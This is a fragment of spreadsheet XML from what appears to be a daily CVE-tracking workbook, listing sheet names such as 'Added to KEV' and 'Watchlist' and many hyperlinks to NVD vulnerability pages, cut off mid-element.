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New Today" sheetId="3" state="visible" r:id="rId3"/>
    <sheet name="Significant Updates" sheetId="4" state="visible" r:id="rId4"/>
    <sheet name="Added to KEV" sheetId="5" state="visible" r:id="rId5"/>
    <sheet name="KEV - Exploited" sheetId="6" state="visible" r:id="rId6"/>
    <sheet name="Critical &amp; High" sheetId="7" state="visible" r:id="rId7"/>
    <sheet name="Watchlist" sheetId="8" state="visible" r:id="rId8"/>
    <sheet name="Packages (GHSA-OSV)" sheetId="9" state="visible" r:id="rId9"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'All CVEs'!$A$1:$T$819</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'New Today'!$A$1:$T$783</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'Significant Updates'!$A$1:$T$34</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'Added to KEV'!$A$1:$T$4</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'KEV - Exploited'!$A$1:$T$4</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'Critical &amp; High'!$A$1:$T$238</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="7" hidden="1">'Watchlist'!$A$1:$T$382</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="8" hidden="1">'Packages (GHSA-OSV)'!$A$1:$T$20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100382" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100075" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14281" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92161" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92609" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93643" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48482" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93641" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93642" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93647" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95832" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-39353" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42322" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62262" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84458" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89055" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93399" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97063" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97064" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-51457" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100520" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100544" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100552" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100575" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100580" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100586" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100587" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100596" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100599" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19804" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61525" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62062" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85542" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89426" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93834" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-94445" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96795" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96812" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97527" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97528" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97555" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97957" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98115" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56725" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56733" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84462" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100172" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100176" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47679" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55214" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71483" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100248" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100368" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100369" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56731" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97898" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100551" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100557" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100568" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100588" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100589" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100391" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100567" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67236" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67409" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67410" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97525" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100387" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100389" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100532" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44642" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-51773" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92713" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97570" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97573" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97875" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98069" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98070" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98130" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100559" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100561" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100585" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100570" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100597" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79153" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91837" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91838" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91839" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91840" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91841" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97548" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97575" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97576" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97577" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97578" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97579" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97580" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97584" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97594" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97602" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97611" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97612" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97903" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97910" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97911" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97937" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97940" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97941" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97971" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97991" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98002" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98017" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98023" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98052" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98073" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98112" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98116" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98122" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98143" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-98156" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49470" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89032" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100578" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100579" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67239" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84893" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100208" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100535" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100541" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100543" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100558" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100560" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-10758" TargetMode="External" Id="rId133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13456" TargetMode="External" Id="rId134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49850" TargetMode="External" Id="rId135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50547" TargetMode="External" Id="rId136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52622" TargetMode="External" Id="rId137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5267" TargetMode="External" Id="rId138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53610" TargetMode="External" Id="rId139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53625" TargetMode="External" Id="rId140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57443" TargetMode="External" Id="rId141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67237" TargetMode="External" Id="rId142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84882" TargetMode="External" Id="rId143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84884" TargetMode="External" Id="rId144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85029" TargetMode="External" Id="rId145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88003" TargetMode="External" Id="rId146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88421" TargetMode="External" Id="rId147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89406" TargetMode="External" Id="rId148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91765" TargetMode="External" Id="rId149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92550" TargetMode="External" Id="rId150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92560" TargetMode="External" Id="rId151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92608" TargetMode="External" Id="rId152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97523" TargetMode="External" Id="rId153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97524" TargetMode="External" Id="rId154" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97531" TargetMode="External" Id="rId155" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97536" TargetMode="External" Id="rId156" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97557" TargetMode="External" Id="rId157" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97562" TargetMode="External" Id="rId158" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97583" TargetMode="External" Id="rId159" /><Relationship 